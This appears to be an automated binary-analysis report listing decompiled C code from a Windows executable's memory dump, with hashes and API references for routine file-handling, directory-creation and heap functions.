String ID:
API String ID: 2714421763-0
Opcode ID: 3948863bd53c8b88d966da880a07cbb8d549c2d93849d7a8301891c3ffeb7867
Instruction ID: 74c3092c49223f76293522e6c00b200ffab506f4b9639e08bb125e0f5482b7d0
Opcode Fuzzy Hash: 3948863bd53c8b88d966da880a07cbb8d549c2d93849d7a8301891c3ffeb7867
Instruction Fuzzy Hash: D9018431B01331E6EB207B72BD0AB5E3B689F01725FA1009FF400AA1D1DA7C89408ABC

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0, Relevance: 6.1, APIs: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004093A0(intOrPtr __ebx, void* __ebp, CHAR* _a4, void* _a8) {
				signed int _v4;
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				signed int _t18;
				int _t20;
				void* _t22;
				unsigned int _t23;
				signed int _t24;
				CHAR* _t27;
				long _t31;
				intOrPtr _t33;
				void* _t36;
				void _t37;
				void _t38;
				signed int _t40;
				int _t43;
				char _t45;
				void* _t48;
				void* _t50;
				CHAR* _t51;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t62;
				signed int _t63;

				_t33 = __ebx;
				_t63 =  &_v524;
				_t18 =  *0x44f5d0; // 0x765b253d
				_v4 = _t18 ^ _t63;
				_t62 = _a8;
				_t51 = _a4;
				if(_t51 != 0) {
					_t31 = GetFileAttributesA(_t51); // executed
					if(_t31 == 0xffffffff) {
						CreateDirectoryA(_t51, 0);
					}
				}
				_t20 =  *_t62;
				if(_t20 == 0) {
					L20:
					return E0042569C(_t20, _t33, _v4 ^ _t63, _t47, _t51, _t57);
				}
				_push(_t57);
				_t58 = _t62;
				_t36 = _t62;
				do {
					if(_t20 == 0x2f || _t20 == 0x5c) {
						_t58 = _t36;
					}
					_t20 =  *(_t36 + 1);
					_t36 = _t36 + 1;
				} while (_t20 != 0);
				if(_t58 != _t62) {
					_t60 = _t58 - _t62;
					E0042D2F0(_t33, _t51, _t60,  &_v264, _t62, _t60);
					 *((char*)(_t63 + _t60 + 0x124)) = 0;
					E004093A0(_t33, _t62, _t51,  &_v264);
					_t63 = _t63 + 0x14;
				}
				_v524 = 0;
				if(_t51 == 0) {
					L14:
					_t22 = _t62;
					_t48 = _t62;
					do {
						_t37 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t37 != 0);
					_t23 = _t22 - _t48;
					_t53 =  &(( &_v524)[0xffffffffffffffff]);
					do {
						_t38 =  *(_t53 + 1);
						_t53 = _t53 + 1;
					} while (_t38 != 0);
					_t40 = _t23 >> 2;
					_t59 = _t48;
					_t24 = memcpy(_t53, _t59, _t40 << 2);
					_t47 =  &_v524;
					_t43 = _t24 & 0x00000003;
					memcpy(_t59 + _t40 + _t40, _t59, _t43);
					_t63 = _t63 + 0x18;
					_t51 = _t59 + _t43 + _t43;
					_t20 = GetFileAttributesA( &_v524);
					_pop(_t57);
					if(_t20 == 0xffffffff) {
						_t20 = CreateDirectoryA( &_v524, 0);
					}
					goto L20;
				} else {
					_t27 = _t51;
					_t50 =  &_v524 - _t51;
					do {
						_t45 =  *_t27;
						 *((char*)(_t50 + _t27)) = _t45;
						_t27 =  &(_t27[1]);
					} while (_t45 != 0);
					goto L14;
				}
			}

0x004093a0
0x004093a0
0x004093a6
0x004093ad
0x004093b5
0x004093bd
0x004093c6
0x004093c9
0x004093d2
0x004093d7
0x004093d7
0x004093d2
0x004093dd
0x004093e2
0x0040949d
0x004094b3
0x004094b3
0x004093e8
0x004093e9
0x004093eb
0x004093f0
0x004093f2
0x004093f8
0x004093f8
0x004093fa
0x004093fd
0x00409400
0x00409406
0x00409408
0x00409414
0x00409422
0x0040942a
0x0040942f
0x0040942f
0x00409434
0x00409439
0x0040944f
0x0040944f
0x00409451
0x00409453
0x00409453
0x00409455
0x00409458
0x00409460
0x00409462
0x00409465
0x00409465
0x00409468
0x0040946b
0x00409471
0x00409474
0x00409476
0x0040947a
0x0040947e
0x00409482
0x00409482
0x00409482
0x00409484
0x0040948d
0x0040948e
0x00409497
0x00409497
0x00000000
0x0040943b
0x0040943f
0x00409441
0x00409443
0x00409443
0x00409445
0x00409448
0x0040944b
0x00000000
0x00409443

APIs

GetFileAttributesA.KERNELBASE(?,00000000,?), ref: 004093C9
CreateDirectoryA.KERNEL32(?,00000000), ref: 004093D7
GetFileAttributesA.KERNEL32(00000000), ref: 00409484
CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?), ref: 00409497

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 16599c5d7e1a4d2861d2bcc546c480b0a909018c5acf963481fb026ff9defe3e
Instruction ID: c1a67cf8a7cf7ceb0d6a47a22962de7bc20155c64eaee93742f5b09badc19805
Opcode Fuzzy Hash: 16599c5d7e1a4d2861d2bcc546c480b0a909018c5acf963481fb026ff9defe3e
Instruction Fuzzy Hash: 9F3146315083445BC7208F2CA8147EBB7A59FD6314F58866EF8A9973C2DB399C09C659

Uniqueness

Uniqueness Score: -1.00%

Function 00407DE0, Relevance: 4.6, APIs: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407DE0(char* __eax, long __ecx, LONG* __edx) {

				if( *__eax == 0) {
					if(__edx != 0) {
						if(__edx != 1) {
							if(__edx == 2) {
								 *((intOrPtr*)(__eax + 0x1c)) =  *((intOrPtr*)(__eax + 0x18)) + __ecx;
							}
							return 0;
						} else {
							 *((intOrPtr*)(__eax + 0x1c)) =  *((intOrPtr*)(__eax + 0x1c)) + __ecx;
							return 0;
						}
					} else {
						 *((intOrPtr*)(__eax + 0x1c)) = __ecx;
						return 0;
					}
				} else {
					if( *((char*)(__eax + 1)) == 0) {
						return 0x1d;
					} else {
						if(__edx != 0) {
							if(__edx != 1) {
								if(__edx != 2) {
									return 0x13;
								} else {
									SetFilePointer( *(__eax + 4), __ecx, 0, __edx); // executed
									return 0;
								}
							} else {
								SetFilePointer( *(__eax + 4), __ecx, 0, __edx);
								return 0;
							}
						} else {
							SetFilePointer( *(__eax + 4),  *((intOrPtr*)(__eax + 0xc)) + __ecx, __edx, __edx); // executed
							return 0;
						}
					}
				}
			}

0x00407de3
0x00407e3e
0x00407e49
0x00407e54
0x00407e5b
0x00407e5b
0x00407e60
0x00407e4b
0x00407e4b
0x00407e50
0x00407e50
0x00407e40
0x00407e40
0x00407e45
0x00407e45
0x00407de5
0x00407de9
0x00407e3b
0x00407deb
0x00407ded
0x00407e07
0x00407e1d
0x00407e35
0x00407e1f
0x00407e27
0x00407e2f
0x00407e2f
0x00407e09
0x00407e11
0x00407e19
0x00407e19
0x00407def
0x00407dfb
0x00407e03
0x00407e03
0x00407ded
0x00407de9

APIs

SetFilePointer.KERNELBASE(?,?,00000002,00000002,00407FF2,?,00408146), ref: 00407DFB
SetFilePointer.KERNEL32(?,00000000,00000000,00000002,00407FF2,?,00408146), ref: 00407E11

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 07335e967f69e19ac073e69da28dc98cbaadf7c70d4b419580cba5237919d3ed
Instruction ID: 329077cc0b3302bc6a483f71a8ee61a07a23285c18840ac4ea8a72a5490f3dbc
Opcode Fuzzy Hash: 07335e967f69e19ac073e69da28dc98cbaadf7c70d4b419580cba5237919d3ed
Instruction Fuzzy Hash: AC0152B0E161006FDB288B24CD48F2776A7EBD9715F55C4F9F004DB2A9E638EC009A98

Uniqueness

Uniqueness Score: -1.00%

Function 00407CC0, Relevance: 4.6, APIs: 3, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00407CC0(CHAR* __eax, long* _a4) {
				void* _t12;
				long _t13;
				long _t16;
				signed int _t18;
				signed int _t19;
				void* _t22;
				long* _t23;
				char* _t24;

				_t23 = _a4;
				 *_t23 = 0; // executed
				_t12 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t22 = _t12;
				if(_t22 != 0xffffffff) {
					_push(_t18);
					_t13 = SetFilePointer(_t22, 0, 0, 1); // executed
					__eflags = _t13 - 0xffffffff;
					_t19 = _t18 & 0xffffff00 | __eflags != 0x00000000;
					_t24 = E0040A3C7(__eflags, 0x20);
					__eflags = _t19;
					 *_t24 = 1;
					 *((char*)(_t24 + 0x10)) = 1;
					 *(_t24 + 1) = _t19;
					 *(_t24 + 4) = _t22;
					 *((char*)(_t24 + 8)) = 0;
					 *(_t24 + 0xc) = 0;
					if(_t19 != 0) {
						_t16 = SetFilePointer(_t22, 0, 0, 1); // executed
						 *(_t24 + 0xc) = _t16;
					}
					 *_a4 = 0;
					return _t24;
				} else {
					 *_t23 = 0x200;
					return 0;
				}
			}

0x00407cc1
0x00407cd9
0x00407cdf
0x00407ce5
0x00407cea
0x00407cf7
0x00407d06
0x00407d08
0x00407d0d
0x00407d15
0x00407d1a
0x00407d1c
0x00407d1f
0x00407d23
0x00407d26
0x00407d29
0x00407d2d
0x00407d34
0x00407d3d
0x00407d3f
0x00407d3f
0x00407d4b
0x00407d52
0x00407ced
0x00407ced
0x00407cf6
0x00407cf6

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000140,00000000,00408DC5,?), ref: 00407CDF
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?), ref: 00407D06
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,00402B68), ref: 00407D3D

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: f844f182230ab8666da5bce096ade335b632f8a012b7c39be7f84d7b513e484e
Instruction ID: 0a37bad6a7a4c1b0c0e26664c60e1e899e41dc4c825f8cafe6ed0b41f619d608
Opcode Fuzzy Hash: f844f182230ab8666da5bce096ade335b632f8a012b7c39be7f84d7b513e484e
Instruction Fuzzy Hash: A41192312883416AF3304B28EC46F96FBD49B41B24F24465EF6A5AB2D1C7F9B880C719

Uniqueness

Uniqueness Score: -1.00%

Function 0042E04D, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E04D(void* __ebx, void* __edx, void* __edi, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;
				void* _t15;

				_t15 = __edx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x452f40 = _t6;
				if(_t6 != 0) {
					_t7 = E0042DFF2(__ebx, _t15, __edi, __eflags);
					__eflags = _t7 - 3;
					 *0x454918 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E0042E24E(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x452f40);
							 *0x452f40 =  *0x452f40 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x0042e04d
0x0042e05e
0x0042e066
0x0042e06b
0x0042e070
0x0042e075
0x0042e078
0x0042e07d
0x0042e0a3
0x0042e0a5
0x0042e0a6
0x0042e07f
0x0042e084
0x0042e089
0x0042e08c
0x00000000
0x0042e08e
0x0042e094
0x0042e09a
0x00000000
0x0042e09a
0x0042e08c
0x0042e06d
0x0042e06d
0x0042e06f
0x0042e06f

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00426CFF,00000001), ref: 0042E05E
HeapDestroy.KERNEL32 ref: 0042E094

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 64b02cb8dbae4e63aa4ddc5fd686d5b03abf75ae3259888c305dd5e488586d45
Instruction ID: 9ff018e43a210781227fa6e342b256b4c5c5ee29807669acf89d3468b04ce661
Opcode Fuzzy Hash: 64b02cb8dbae4e63aa4ddc5fd686d5b03abf75ae3259888c305dd5e488586d45
Instruction Fuzzy Hash: 3AE06D72B113209FEB24AB32BD0672A36E4A741747F40487BF411C51A5EFE8C541A64D

Uniqueness

Uniqueness Score: -1.00%

Function 00408D60, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00408D60(void* __edi, signed int* __esi, char _a4) {
				CHAR* _t12;
				intOrPtr _t14;
				signed int _t17;
				char _t22;
				char _t23;
				char _t24;
				char* _t26;
				CHAR* _t28;
				char* _t30;
				signed int* _t31;

				_t31 = __esi;
				if( *__esi != 0 || __esi[1] != 0xffffffff) {
					return 0x1000000;
				} else {
					_t2 =  &(_t31[0x50]); // 0x140
					_t28 = _t2;
					GetCurrentDirectoryA(0x104, _t28);
					_t12 = _t28;
					_t3 =  &(_t12[1]); // 0x141
					_t26 = _t3;
					do {
						_t24 =  *_t12;
						_t12 =  &(_t12[1]);
					} while (_t24 != 0);
					_t14 =  *((intOrPtr*)(_t12 - _t26 +  &(__esi[0x4f])));
					if(_t14 != 0x5c && _t14 != 0x2f) {
						_t30 =  &(_t28[0xffffffffffffffff]);
						do {
							_t22 = _t30[1];
							_t30 =  &(_t30[1]);
						} while (_t22 != 0);
						_t23 = "\\"; // 0x5c
						 *_t30 = _t23;
					}
					if(E00407CC0(_a4,  &_a4) != 0) {
						_t17 = E00408120(_t16,  &_a4); // executed
						 *_t31 = _t17;
						asm("sbb eax, eax");
						return ( ~_t17 & 0xfffffe00) + 0x200;
					} else {
						return _a4; // executed
					}
				}
			}

0x00408d60
0x00408d63
0x00408df1
0x00408d6f
0x00408d70
0x00408d70
0x00408d7c
0x00408d82
0x00408d84
0x00408d84
0x00408d87
0x00408d87
0x00408d89
0x00408d8c
0x00408d92
0x00408d9b
0x00408da1
0x00408da4
0x00408da4
0x00408da7
0x00408daa
0x00408dae
0x00408db4
0x00408db4
0x00408dcb
0x00408dd4
0x00408dd9
0x00408ddd
0x00408de9
0x00408dcd
0x00408dd1
0x00408dd1
0x00408dcb

APIs

GetCurrentDirectoryA.KERNEL32(00000104,00000140,?,0040981E,?), ref: 00408D7C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: fdb3fe9914c0374b49e2e00bef7fe182a3c51c44e49b0d01743458a663f4ddc7
Instruction ID: 0808c205175f113802f656b652801237e7633678409517e229329a331224aac0
Opcode Fuzzy Hash: fdb3fe9914c0374b49e2e00bef7fe182a3c51c44e49b0d01743458a663f4ddc7
Instruction Fuzzy Hash: D901D2765146428BC7208B28DA047D377A1AFF5314F18473EE8E5973E1D6389445C719

Uniqueness

Uniqueness Score: -1.00%

Function 00407E70, Relevance: 1.5, APIs: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407E70(signed int __ebx, void* __edx, char* __edi, void* __ebp, long _a4) {
				void* __esi;
				intOrPtr _t18;
				int _t26;
				signed int _t29;
				intOrPtr _t30;
				char* _t37;
				long _t39;

				_t37 = __edi;
				_t32 = __edx;
				_t29 = __ebx;
				_t39 = __ebx * _a4;
				if( *__edi == 0) {
					_t30 =  *((intOrPtr*)(__edi + 0x1c));
					_t18 =  *((intOrPtr*)(__edi + 0x18));
					if(_t30 + _t39 > _t18) {
						_t39 = _t18 - _t30;
					}
					E0042D2F0(_t29, _t37, _t39, _t32,  *((intOrPtr*)(_t37 + 0x14)) + _t30, _t39);
					 *((intOrPtr*)(_t37 + 0x1c)) =  *((intOrPtr*)(_t37 + 0x1c)) + _t39;
					return _t39 / _t29;
				} else {
					_t26 = ReadFile( *(__edi + 4), __edx, _t39,  &_a4, 0); // executed
					if(_t26 == 0) {
						 *((char*)(__edi + 8)) = 1;
					}
					return _a4 / _t29;
				}
			}

0x00407e70
0x00407e70
0x00407e70
0x00407e73
0x00407e7b
0x00407ea2
0x00407ea5
0x00407eaf
0x00407eb3
0x00407eb3
0x00407ebd
0x00407ec2
0x00407ecf
0x00407e7d
0x00407e8a
0x00407e92
0x00407e94
0x00407e94
0x00407ea1
0x00407ea1

APIs

ReadFile.KERNELBASE(?,00000000,?,?,00000000,?,004080AD,00000001), ref: 00407E8A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4001daca4011db168c611b4f12633618abaca6e10e548e279e3d855eb192054a
Instruction ID: 1fb4788c542a52e55d567ecce4f90512b494cb768eca08f52c89fd095b57340d
Opcode Fuzzy Hash: 4001daca4011db168c611b4f12633618abaca6e10e548e279e3d855eb192054a
Instruction Fuzzy Hash: F7F0D172A086116FE314CE29EC84AA3B7A9BB88304F04826AF404C3641E335FCA0C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB0, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407DB0(char* __esi) {
				long _t8;

				if( *__esi == 0) {
					return  *((intOrPtr*)(__esi + 0x1c));
				} else {
					if( *((char*)(__esi + 1)) == 0) {
						return 0;
					} else {
						_t8 = SetFilePointer( *(__esi + 4), 0, 0, 1); // executed
						return _t8 -  *((intOrPtr*)(__esi + 0xc));
					}
				}
			}

0x00407db3
0x00407dd5
0x00407db5
0x00407db9
0x00407dd1
0x00407dbb
0x00407dc5
0x00407dce
0x00407dce
0x00407db9

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00408007,?,?,?,00408146), ref: 00407DC5

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a0329f0c03857acd2e86ebda1aa9dacd9694a0e4b7ebf0ec5a87055189def8c9
Instruction ID: b3f8015f2b99cbfaca17f5ee9d5e03acefb77c23b9211ba1d31102a6468c6a78
Opcode Fuzzy Hash: a0329f0c03857acd2e86ebda1aa9dacd9694a0e4b7ebf0ec5a87055189def8c9
Instruction Fuzzy Hash: 18D09E71A547416EEF31CF78CD49F57BBD26F40700F188899B195966D0D6B8F840D705

Uniqueness

Uniqueness Score: -1.00%

Function 00407D60, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00407D60(signed int __eax, void* __esi) {
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __esi;
				if(__esi != 0) {
					__eflags =  *((char*)(__esi + 0x10));
					if(__eflags != 0) {
						FindCloseChangeNotification( *(__esi + 4)); // executed
					}
					_push(_t12);
					E0040A3F2(_t9, _t10, _t11, _t12, __eflags);
					__eflags = 0;
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00407d60
0x00407d62
0x00407d68
0x00407d6c
0x00407d72
0x00407d72
0x00407d78
0x00407d79
0x00407d81
0x00407d83
0x00407d64
0x00407d67
0x00407d67

APIs

FindCloseChangeNotification.KERNELBASE(?,0040824C), ref: 00407D72

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6cfa23161bdcb48f057034206e3ce0ae030a9d9b33e8d8f720c3a8cd2603ffc3
Instruction ID: 6a7060c61181943a0c287ffa944c06f0eec16248c8ae896a62aa508370566203
Opcode Fuzzy Hash: 6cfa23161bdcb48f057034206e3ce0ae030a9d9b33e8d8f720c3a8cd2603ffc3
Instruction Fuzzy Hash: 19D022A2C00E1017DB325770584C65B36802F01320F440F74F871E22E0E7BCF844D38A

Uniqueness

Uniqueness Score: -1.00%

Function 00407790, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407790(intOrPtr _a8, intOrPtr _a12) {
				void* _t4;
				void* _t6;
				void* _t9;

				_t4 = E00426402(_a8, _t6, _t9, _a8, _a12); // executed
				return _t4;
			}

0x0040779a
0x004077a2

APIs

_calloc.LIBCMT ref: 0040779A

Part of subcall function 00426402: __calloc_impl.LIBCMT ref: 00426415

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __calloc_impl_calloc
String ID:
API String ID: 2108883976-0
Opcode ID: 2e37508f34e5ea80014958685080034130a6a83499dcf00b709e2b0791e3b3cd
Instruction ID: 646514b3ee2c0e5131ae24e5f3eb0d47da1f3c2f0b146c3c16072085042eef41
Opcode Fuzzy Hash: 2e37508f34e5ea80014958685080034130a6a83499dcf00b709e2b0791e3b3cd
Instruction Fuzzy Hash: 40B012F96042107FC608FB10ECC2C3BB398EBD4200FC1880DBC8842241D53DD804C726

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00421296, Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00421296(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;

				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x44f5d0; // 0x765b253d
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E004271DA(E0043B2A4, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				if((0 | _t92 != 0x00000000) == 0) {
					L1:
					E00415838(_t76);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E00401FA0(_t98 - 0x10, E004151D0());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E004210CC(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E00401E60( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													__eflags = 0x104 - _t89;
													E0040AA60(_t90, _t98,  *(_t98 - 0x14), 0x104 - _t89,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E0042126B(_t92,  *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E00401E60( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E00414516(_t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E0042126B(_t92,  *((intOrPtr*)(_t98 - 0x18)));
					L5:
